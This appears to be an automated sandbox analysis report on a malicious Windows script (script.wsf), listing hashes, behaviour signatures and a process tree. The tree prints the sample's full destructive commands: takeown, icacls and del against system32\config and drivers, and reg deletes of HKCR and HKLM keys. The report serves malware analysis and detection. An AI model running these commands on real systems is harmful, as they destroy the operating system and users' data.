Analysis
- max time kernel: 149s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-08-2024 21:44

Tasks
- Static task: static1
- Behavioral task: behavioral1
  - Sample: script.wsf
  - Resource: win7-20240704-en
General
- Target: script.wsf
- Size: 3KB
- MD5: 0355b976d816c3dafeda740c75450a08
- SHA1: 98de5b1ee4c653658966effecf248bf7a8df7cd1
- SHA256: 7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
- SHA512: 2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (pid, process):
  - 2732 takeown.exe
  - 2000 takeown.exe
  - 1244 icacls.exe
  - 3144 icacls.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
  - Key value queried: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation (cmd.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Modifies file permissions (1 TTPs, 4 IoCs)
  Processes (pid, process):
  - 2000 takeown.exe
  - 1244 icacls.exe
  - 3144 icacls.exe
  - 2732 takeown.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description, ioc, process):
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (wermgr.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (wermgr.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (wermgr.exe)
- Enumerates system info in registry (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (wermgr.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (wermgr.exe)
- Modifies registry class (2 IoCs)
  Processes (description, ioc, process):
  - Key created: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings (cmd.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings (OpenWith.exe)
- Modifies registry key (1 TTPs, 1 IoCs)
- Opens file in notepad (likely ransom note) (1 IoCs)
  Processes (pid, process):
  - 1044 NOTEPAD.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes (pid, process):
  - 3672 vlc.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes (pid, process):
  - 3672 vlc.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, pid, process):
  - Token: SeTakeOwnershipPrivilege, 2732 takeown.exe
  - Token: SeTcbPrivilege, 4436 svchost.exe
  - Token: SeRestorePrivilege, 4436 svchost.exe
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes (pid, process):
  - 3672 vlc.exe (4 occurrences)
- Suspicious use of SendNotifyMessage (3 IoCs)
  Processes (pid, process):
  - 3672 vlc.exe (3 occurrences)
- Suspicious use of SetWindowsHookEx (14 IoCs)
  Processes (pid, process):
  - 3672 vlc.exe (1 occurrence)
  - 2252 OpenWith.exe (13 occurrences)
- Suspicious use of WriteProcessMemory (30 IoCs)
  Processes (description, pid, process, target process; each entry was recorded twice):
  - PID 720 wrote to memory of 4456: cmd.exe -> WScript.exe
  - PID 4456 wrote to memory of 636: WScript.exe -> cmd.exe
  - PID 4456 wrote to memory of 3820: WScript.exe -> cmd.exe
  - PID 3820 wrote to memory of 2732: cmd.exe -> takeown.exe
  - PID 636 wrote to memory of 2000: cmd.exe -> takeown.exe
  - PID 636 wrote to memory of 1244: cmd.exe -> icacls.exe
  - PID 3820 wrote to memory of 3144: cmd.exe -> icacls.exe
  - PID 4456 wrote to memory of 1872: WScript.exe -> cmd.exe
  - PID 4456 wrote to memory of 3588: WScript.exe -> cmd.exe
  - PID 4456 wrote to memory of 4572: WScript.exe -> cmd.exe
  - PID 1872 wrote to memory of 4088: cmd.exe -> reg.exe
  - PID 3588 wrote to memory of 5016: cmd.exe -> reg.exe
  - PID 4572 wrote to memory of 4072: cmd.exe -> reg.exe
  - PID 4436 wrote to memory of 728: svchost.exe -> dashost.exe
  - PID 2252 wrote to memory of 1044: OpenWith.exe -> NOTEPAD.EXE
Processes (process tree; indentation shows parent/child relationship)
- C:\Windows\system32\cmd.exe (PID 720)
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
  Signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe (PID 4456)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (PID 636)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (PID 2000)
        Command line: takeown /f c:\windows\system32\config\*
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\system32\icacls.exe (PID 1244)
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\System32\cmd.exe (PID 3820)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\takeown.exe (PID 2732)
        Command line: takeown /f c:\windows\system32\drivers\*
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe (PID 3144)
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\System32\cmd.exe (PID 1872)
      Command line: "C:\Windows\System32\cmd.exe" /c reg.exe delete HKCR\*.dll /f
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\reg.exe (PID 4088)
        Command line: reg.exe delete HKCR\*.dll /f
    - C:\Windows\System32\cmd.exe (PID 3588)
      Command line: "C:\Windows\System32\cmd.exe" /c reg.exe delete HKCR\*.exe /f
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\reg.exe (PID 5016)
        Command line: reg.exe delete HKCR\*.exe /f
    - C:\Windows\System32\cmd.exe (PID 4572)
      Command line: "C:\Windows\System32\cmd.exe" /c reg.exe delete HKLM\* /f
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\reg.exe (PID 4072)
        Command line: reg.exe delete HKLM\* /f
        Signatures: Modifies registry key
- C:\Windows\system32\svchost.exe (PID 4436)
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
  Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\dashost.exe (PID 728)
    Command line: dashost.exe {1e311568-a5fe-462b-b57c715b317ab229}
- C:\Program Files\VideoLAN\VLC\vlc.exe (PID 3672)
  Command line: "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\StartComplete.mid"
  Signatures: Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of SetWindowsHookEx
- C:\Windows\system32\wermgr.exe (PID 916)
  Command line: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3188" "928" "840" "932" "0" "0" "936" "940" "0" "0" "0" "0"
  Signatures: Checks processor information in registry; Enumerates system info in registry
- C:\Windows\system32\OpenWith.exe (PID 2252)
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  Signatures: Modifies registry class; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\NOTEPAD.EXE (PID 1044)
    Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\StartComplete.mid
    Signatures: Opens file in notepad (likely ransom note)
Network
MITRE ATT&CK Enterprise v15
Downloads